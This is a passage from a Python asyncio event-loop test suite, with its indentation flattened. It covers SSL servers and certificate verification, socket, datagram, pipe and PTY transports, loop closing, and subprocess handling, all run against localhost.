f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, ONLYCERT, ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
def test_legacy_create_server_ssl(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, ONLYCERT, ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
def test_legacy_create_unix_server_ssl(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
def test_legacy_create_server_ssl_verify_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_verify_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
def test_legacy_create_unix_server_ssl_verify_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl_verify_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"hostname '127.0.0.1' doesn't match 'localhost'"):
self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
server.close()
def test_legacy_create_server_ssl_match_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_match_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_legacy_create_unix_server_ssl_verified(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl_verified()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
self.check_ssl_extra_info(client,peername=(host, port),
peercert=PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_legacy_create_server_ssl_verified(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_verified()
def test_create_server_sock(self):
proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertIs(sock, sock_ob)
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = support.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = asyncio.Future(loop=self.loop)
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def test_create_datagram_endpoint(self):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=('127.0.0.1', 0))
s_transport, server = self.loop.run_until_complete(coro)
host, port = s_transport.get_extra_info('sockname')
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint_sock(self):
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_connection(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
@asyncio.coroutine
def connect():
t, p = yield from self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces the issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
@asyncio.coroutine
def connect():
read_transport, _ = yield from loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = yield from loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
# Issue #20495: The test hangs on FreeBSD 7.2 but passes on FreeBSD 9
@support.requires_freebsd_version(8)
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
@asyncio.coroutine
def connect():
t, p = yield from self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = test_utils.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=10)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1, timeout=10)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5, timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
r, w = test_utils.socketpair()
r.setblocking(False)
f = self.loop.sock_recv(r, 1)
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
@asyncio.coroutine
def main():
try:
self.loop.call_soon(f.cancel)
yield from f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = asyncio.Task(main(), loop=self.loop)
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
@asyncio.coroutine
def wait():
loop = self.loop
yield from asyncio.sleep(1e-2, loop=loop)
yield from asyncio.sleep(1e-4, loop=loop)
yield from asyncio.sleep(1e-6, loop=loop)
yield from asyncio.sleep(1e-8, loop=loop)
yield from asyncio.sleep(1e-10, loop=loop)
self.loop.run_until_complete(wait())
# The ideal number of calls is 12, but on some platforms the selector
# may sleep a little bit less than the timeout depending on the
# resolution of the clock used by the kernel. Tolerate a few extra
# calls on these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = test_utils.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = test_utils.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
@asyncio.coroutine
def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
@asyncio.coroutine
def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = asyncio.Future(loop=self.loop)
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.run_in_executor(None, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
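# The mixin below exercises subprocess_exec()/subprocess_shell(); judging from
# the assertions, the helper scripts it launches (echo.py, echo2.py, echo3.py)
# echo stdin back on stdout, with echo2.py/echo3.py also reporting on stderr.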
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
